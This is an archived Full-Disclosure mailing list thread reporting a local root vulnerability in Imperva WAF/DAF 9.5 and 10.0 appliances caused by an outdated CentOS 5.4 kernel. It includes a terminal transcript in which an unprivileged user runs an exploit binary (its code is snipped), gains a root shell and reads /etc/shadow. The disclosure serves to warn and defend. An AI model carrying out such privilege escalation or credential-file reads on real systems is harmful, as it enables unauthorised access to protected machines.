[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Imperva WAF/DAF 9.5 patch8 and 10.0 patch 2 localroot vulnerability

To: "adam" <iarethebest@xxxxxxxxx>
Subject: Re: [Full-disclosure] Imperva WAF/DAF 9.5 patch8 and 10.0 patch 2 localroot vulnerability
From: "steve jobs" <job.steve@xxxxxxxx>
Date: Thu, 21 Nov 2013 12:19:45 -0500

Imperva was holy shit in fact,the system was still running with the old and 
unsecure kernel.
----- Original Message -----
From: adam
Sent: 11/21/13 05:39 PM
To: steve jobs
Subject: Re: [Full-disclosure] Imperva WAF/DAF 9.5 patch8 and 10.0 patch 2 
localroot vulnerability

Holy shit you guys, a ghost. 

On Wed, Nov 20, 2013 at 9:12 AM, steve jobs < job.steve@xxxxxxxx > 
wrote:Imperva use hardened centos 5.4 to run Web Application Firewall and 
Database Activity Monitoring product.
It could be exploit to get root in the kernel 2.6.18-164.15.1.el5.imp4 which 
was built by imperva in 9.5 patch 8 and 10.0 patch 2.
I hope imperva could upgrade your OS to centos 5.9 with kernel 2.6.18-348 to 
keep your system secure.
Your can check the attachment for details.

[test95p8@GFWAF ~]$ uname -a
Linux GFWAF 2.6.18-164.15.1.el5.imp4 #1 SMP Mon Apr 8 15:29:20 IDT 2013 x86_64 
x86_64 x86_64 GNU/Linux
[test95p8@GFWAF ~]$ cat /etc/redhat-release
Imperva release 5.4 (Final)
[test95p8@GFWAF ~]$ wc -l /etc/shadow
wc: /etc/shadow: Permission denied
[test95p8@GFWAF ~]$ id
uid=505(test95p8) gid=507(test95p8) groups=507(test95p8)
[test95p8@GFWAF ~]$ ./centos54_localroot_exp
########snip##############
sh-3.2# id
uid=0(root) gid=507(test95p8) groups=507(test95p8)
sh-3.2# wc -l /etc/shadow
40 /etc/shadow
sh-3.2#

[root@WAF ~]# impctl platform show 2> /dev/null | grep version
version 10.0.0.2_0
[root@WAF ~]# uname -a
Linux WAF 2.6.18-164.15.1.el5.imp4 #1 SMP Mon Apr 8 15:29:20 IDT 2013 x86_64 
x86_64 x86_64 GNU/Linux
[root@WAF ~]# cat /etc/redhat-release
Imperva release 5.4 (Final)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html 
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] Facebook Vulnerability Discloses Friends Lists Defined as Private
Next by Date: [Full-disclosure] [SECURITY] [DSA 2801-1] libhttp-body-perl security update
Previous by thread: [Full-disclosure] Facebook Vulnerability Discloses Friends Lists Defined as Private
Next by thread: Re: [Full-disclosure] Imperva WAF/DAF 9.5 patch8 and 10.0 patch 2 localroot vulnerability
Index(es):
- Date
- Thread